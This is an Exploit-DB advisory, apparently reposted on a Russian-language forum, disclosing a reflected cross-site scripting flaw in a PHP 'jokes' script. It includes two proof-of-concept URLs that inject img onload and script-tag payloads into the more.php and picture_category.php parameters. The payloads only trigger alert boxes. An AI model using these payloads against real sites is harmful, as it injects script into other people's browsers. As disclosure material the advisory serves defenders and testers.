- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10673
- Проверка EDB
-
- Пройдено
- Автор
- INDOUSHKA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-26
Код:
========================================================================================
| # Title : jokes Cross Site Scripting Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) |
| # Web Site : www.iq-ty.com |
| # Script : Copyright © 2004 äßÊ ÓÚæÏí Ýí Èí . Powered by DieselScripts.com |
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) |
| # Bug : XSS |
====================== Exploit By indoushka =================================
| # Exploit :
|
| 1-http://server/jokes/more.php?by=1<img+src=http://server/matrix.bmp+onload=alert(213771818860)>
| 2-http://server/jokes/picture_category.php?id=1>"><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>
|
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
